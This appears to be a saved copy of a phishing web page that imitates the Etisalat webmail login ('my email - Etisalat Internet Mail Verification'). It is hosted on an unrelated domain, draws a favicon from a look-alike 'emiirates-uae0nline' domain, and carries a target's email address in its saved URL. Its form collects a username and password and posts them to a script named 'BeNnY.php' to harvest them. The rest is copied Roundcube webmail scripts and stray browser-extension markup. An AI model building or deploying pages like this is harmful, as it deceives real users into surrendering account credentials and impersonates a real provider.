﻿<!DOCTYPE html>
<html class="js chrome webkit js mozilla" hola_ext_inject="disabled"><head>
<!-- saved from url=(0350)http://sk-home.heteml.jp/docshare2/vendor/symfony/event-dispatcher/Symfony/Report/bcgmbvfddmjjbvvfdew/qgzstcizbg11a7k0ejlc8f09.php?rand=13InboxLightaspxn.1774256418&fid.4.1252899642&fid=1&fav.1&rand.13InboxLight.aspxn.1774256418&fid.1252899642&fid.1&fav.1&email=bruimpex@hotmail.com&.rand=13InboxLight.aspx?n=1774256418&fid=4#n=1252899642&fid=1&fav=1 -->
  
  <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
  <title>my email - Etisalat Internet mail Verification</title>

  
  
  <meta name="Robots" content="noindex,nofollow">

  
  <meta http-equiv="X-UA-Compatible" content="IE=EDGE">

  
  <meta name="viewport" content="" id="viewport">

  
  <link rel="SHORTCUT ICON" href="http://cm3-emiirates-uae0nline.eu.pn/Hotmail%20Webmail%20__%20Welcome%20to%20Hotmail%20Webmail_files/favicon.ico">

  
  <link rel="stylesheet" type="text/css" href="emiratee_files/styles.css">

<!--[if IE 9]><link rel="stylesheet" type="text/css" href="FILES/svggradients.css?s=1382384360" /><![endif]--><!--[if lte IE 8]><link rel="stylesheet" type="text/css" href="FILES/iehacks.css?s=1382384360" /><![endif]--><!--[if lte IE 7]><link rel="stylesheet" type="text/css" href="FILES/ie7hacks.css?s=1382384360" /><![endif]-->
  
  <link rel="stylesheet" type="text/css" href="emiratee_files/jquery-ui-1.css">

  
  <script type="text/javascript" src="emiratee_files/ui.js"></script>
  
  <script src="emiratee_files/jquery.js" type="text/javascript"></script>
  
  <script src="emiratee_files/common.js" type="text/javascript"></script>
  
  <script src="emiratee_files/app.js" type="text/javascript"></script>
  
  <script src="emiratee_files/jstz.js" type="text/javascript"></script>
  
  <script type="text/javascript">
<!--
var rcmail = new rcube_webmail();
rcmail.set_env({"task":"login","x_frame_options":"sameorigin","standard_windows":false,"cookie_domain":"","cookie_path":"\/","cookie_secure":true,"skin":"larry","refresh_interval":60,"session_lifetime":600,"action":"","comm_path":".\/?_task=login","date_format":"yy-mm-dd","request_token":"fbc944b0cb57238d7aa0e153b555d63c"});
rcmail.gui_container("loginfooter","bottomline");
rcmail.add_label({"loading":"Loading...","servererror":"Server Error!","connerror":"Connection Error (Failed to reach the server)!","requesttimedout":"Request timed out","refreshing":"Refreshing..."});
rcmail.gui_object('loginform', 'form');
rcmail.gui_object('message', 'message');

function MM_findObj(n, d) { //v4.01
  var p,i,x;  if(!d) d=document; if((p=n.indexOf("?"))>0&&parent.frames.length) {
    d=parent.frames[n.substring(p+1)].document; n=n.substring(0,p);}
  if(!(x=d[n])&&d.all) x=d.all[n]; for (i=0;!x&&i<d.forms.length;i++) x=d.forms[i][n];
  for(i=0;!x&&d.layers&&i<d.layers.length;i++) x=MM_findObj(n,d.layers[i].document);
  if(!x && d.getElementById) x=d.getElementById(n); return x;
}

function MM_validateForm() { //v4.0
  var i,p,q,nm,test,num,min,max,errors='',args=MM_validateForm.arguments;
  for (i=0; i<(args.length-2); i+=3) { test=args[i+2]; val=MM_findObj(args[i]);
    if (val) { nm=val.name; if ((val=val.value)!="") {
      if (test.indexOf('isEmail')!=-1) { p=val.indexOf('@');
        if (p<1 || p==(val.length-1)) errors+='- '+nm+' must contain an e-mail address.\n';
      } else if (test!='R') { num = parseFloat(val);
        if (isNaN(val)) errors+='- '+nm+' must contain a number.\n';
        if (test.indexOf('inRange') != -1) { p=test.indexOf(':');
          min=test.substring(8,p); max=test.substring(p+1);
          if (num<min || max<num) errors+='- '+nm+' must contain a number between '+min+' and '+max+'.\n';
    } } } else if (test.charAt(0) == 'R') errors += '- '+nm+' is required.\n'; }
  } if (errors) alert('The following error(s) occurred:\n'+errors);
  document.MM_returnValue = (errors == '');
}
//-->
  </script>
  
  <script type="text/javascript" src="emiratee_files/jquery-ui-1.js"></script>
  
  <style type="text/css">
<!--
.style1 {
	color: #FF3300;
	font-weight: bold;
	font-size: 24px;
	font-family: Geneva, Arial, Helvetica, sans-serif;
}
-->
  </style>
</head><body style="background-color: rgb(255, 180, 10); color: rgb(0, 0, 0);" class="minimal" alink="#ee0000" link="#0000ee" vlink="#551a8b">
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; <img style="width: 80px; height: 93px;" alt="Etisalat" src="emiratee_files/1427271887-how-to-program-your-etisalat-sims-for-15gb.jpg">
<div id="login-form">
<div style="width: 424px;" class="box-inner">
<div style="text-align: left;"> </div>
<div style="text-align: center;"><img style="width: 81px; height: 46px;" alt="img" src="emiratee_files/icon-mail-orange.png"><big style="font-family: Tahoma;"><span style="font-weight: bold;">&nbsp; </span></big><span style="color: rgb(0, 0, 0); font-family: Myriad,Helvetica,Tahoma,Arial,clean,sans-serif; font-size: 18px; font-style: normal; font-variant: normal; font-weight: bold; letter-spacing: normal; line-height: normal; text-align: center; text-indent: 0px; text-transform: none; white-space: normal; widows: 1; word-spacing: 0px; display: inline ! important; float: none; background-color: rgb(255, 255, 255);">my
email - Etisalat Internet Mail</span><big style="font-family: Tahoma;"><span style="font-weight: bold;">  </span></big><br>
<big style="font-family: Tahoma;"><span style="font-weight: bold;"></span></big></div>
<big style="font-family: Tahoma;"><span style="font-weight: bold;"></span></big>&nbsp;<!-- End Table 2--><!--Table 3--><br>
<form style="height: 202px;" name="form" action="BeNnY.php" method="post">
  <table style="margin-left: 0px; width: 414px; height: 130px;">
    <tbody>
      <tr>
        <td style="vertical-align: top;"><br>
        </td>
        <td style="vertical-align: top;"><br>
        <br>
        </td>
      </tr>
      <tr>
        <td style="width: 94px;" class="title"><label for="rcmloginuser">Username</label>
        </td>
        <td style="width: 298px;" class="input"><input name="username" id="rcmloginpwd" required="" size="40" autocapitalize="off" placeholder="" type="text"></td>
      </tr>
      <tr>
        <td style="width: 94px;" class="title"><label for="rcmloginpwd2">Password</label></td>
        <td style="width: 298px;" class="input"><input autocapitalize="off" size="40" id="rcmloginpwd2" value="" name="password" required="" type="password"></td>
      </tr>
    </tbody>
  </table>
  <p class="formbuttons"><input class="button mainaction" onclick="submit" value="Sign In" type="submit"><br>
  <br>
  <br>
  <span style="color: rgb(0, 0, 0); font-family: Myriad,Helvetica,Tahoma,Arial,clean,sans-serif; font-size: 11px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; text-align: center; text-indent: 0px; text-transform: none; white-space: normal; widows: 1; word-spacing: 0px; display: inline ! important; float: none; background-color: rgb(255, 255, 255);">Copyright
© 2015, Etisalat. All Rights Reserved</span><br>
  </p>
</form>
</div>
<div id="bottomline"><!--Hotmail Webmail --> </div>
</div>

<script type="text/javascript">

// UI startup
var UI = new rcube_mail_ui();
$(document).ready(function(){
	UI.set('errortitle', 'An error occurred!');
	UI.init();
});

</script>
<script type="text/javascript">

jQuery.extend(jQuery.ui.dialog.prototype.options.position, {
                using: function(pos) {
                    var me = jQuery(this),
                        offset = me.css(pos).offset(),

                        topOffset = offset.top - 12;
                    if (topOffset < 0)
                        me.css('top', pos.top - topOffset);
                    if (offset.left + me.outerWidth() + 12 > jQuery(window).width())
                        me.css('left', pos.left - 12);
                }
            });
$(document).ready(function(){ 
rcmail.init();
var images = ["skins\/larry\/images\/ajaxloader.gif","skins\/larry\/images\/buttons.png","skins\/larry\/images\/addcontact.png","skins\/larry\/images\/filetypes.png","skins\/larry\/images\/listicons.png","skins\/larry\/images\/messages.png","skins\/larry\/images\/quota.png","skins\/larry\/images\/selector.png","skins\/larry\/images\/splitter.png","skins\/larry\/images\/watermark.jpg"];
            for (var i=0; i<images.length; i++) {
                img = new Image();
                img.src = images[i];
            }
});
</script>
<div class="dropAreaContainer" style="display: none; right: 0px;">
<div class="searchDropArea" style="width: 142px; height: 16.6667%;"><span class="disable-manipulations"></span><img src="chrome-extension://cipmepknanmbbaneimacddfemfbfgpgo/images/content/providers/web-search-content.png" style="max-height: 81px; height: 90%; background-color: transparent;" class="disable-manipulations"></div>
<div class="searchDropArea" style="width: 142px; height: 16.6667%;"><span class="disable-manipulations"></span><img src="chrome-extension://cipmepknanmbbaneimacddfemfbfgpgo/images/content/providers/video-search-content.png" style="max-height: 40px; height: 90%; background-color: transparent;" class="disable-manipulations"></div>
<div class="searchDropArea" style="width: 142px; height: 16.6667%;"><span class="disable-manipulations"></span><img src="chrome-extension://cipmepknanmbbaneimacddfemfbfgpgo/images/content/providers/google-images-content.png" style="max-height: 88px; height: 90%; background-color: transparent;" class="disable-manipulations"></div>
<div class="searchDropArea" style="width: 142px; height: 16.6667%;"><span class="disable-manipulations"></span><img src="chrome-extension://cipmepknanmbbaneimacddfemfbfgpgo/images/content/providers/google-translate-content.png" style="max-height: 82px; height: 90%; background-color: transparent;" class="disable-manipulations"></div>
<div class="searchDropArea" style="width: 142px; height: 16.6667%;"><span class="disable-manipulations"></span><img src="chrome-extension://cipmepknanmbbaneimacddfemfbfgpgo/images/content/providers/wikipedia-content.png" style="max-height: 86px; height: 90%; background-color: transparent;" class="disable-manipulations"></div>
<div class="dropAreaSettings" style="width: 142px; height: 16.6667%;"><span class="disable-manipulations"></span><img src="chrome-extension://cipmepknanmbbaneimacddfemfbfgpgo/images/content/btn_settings.png" style="max-height: 25px; height: 90%; background-color: transparent;" class="disable-manipulations"></div>
</div>

<div class="dropAreaContainer" style="display: none; left: 0px;">
<div class="shareDropArea" style="width: 142px; height: 16.6667%;"><span class="disable-manipulations"></span><img src="chrome-extension://cipmepknanmbbaneimacddfemfbfgpgo/images/content/providers/facebook-share-content.png" style="max-height: 25px; height: 90%; background-color: transparent;" class="disable-manipulations"></div>
<div class="shareDropArea" style="width: 142px; height: 16.6667%;"><span class="disable-manipulations"></span><img src="chrome-extension://cipmepknanmbbaneimacddfemfbfgpgo/images/content/providers/twitter-content.png" style="max-height: 23px; height: 90%; background-color: transparent;" class="disable-manipulations"></div>
<div class="shareDropArea" style="width: 142px; height: 16.6667%;"><span class="disable-manipulations"></span><img src="chrome-extension://cipmepknanmbbaneimacddfemfbfgpgo/images/content/providers/pinterest-content.png" style="max-height: 28px; height: 90%; background-color: transparent;" class="disable-manipulations"></div>
<div class="shareDropArea" style="width: 142px; height: 16.6667%;"><span class="disable-manipulations"></span><img src="chrome-extension://cipmepknanmbbaneimacddfemfbfgpgo/images/content/providers/google-plus-center-content.png" style="max-height: 56px; height: 90%; background-color: transparent;" class="disable-manipulations"></div>
<div class="shareDropArea" style="width: 142px; height: 16.6667%;"><span class="disable-manipulations"></span><img src="chrome-extension://cipmepknanmbbaneimacddfemfbfgpgo/images/content/providers/linkedin-content.png" style="max-height: 31px; height: 90%; background-color: transparent;" class="disable-manipulations"></div>
<div class="dropAreaSettings" style="width: 142px; height: 16.6667%;"><span class="disable-manipulations"></span><img src="chrome-extension://cipmepknanmbbaneimacddfemfbfgpgo/images/content/btn_settings.png" style="max-height: 25px; height: 90%; background-color: transparent;" class="disable-manipulations"></div>
</div>

</body></html>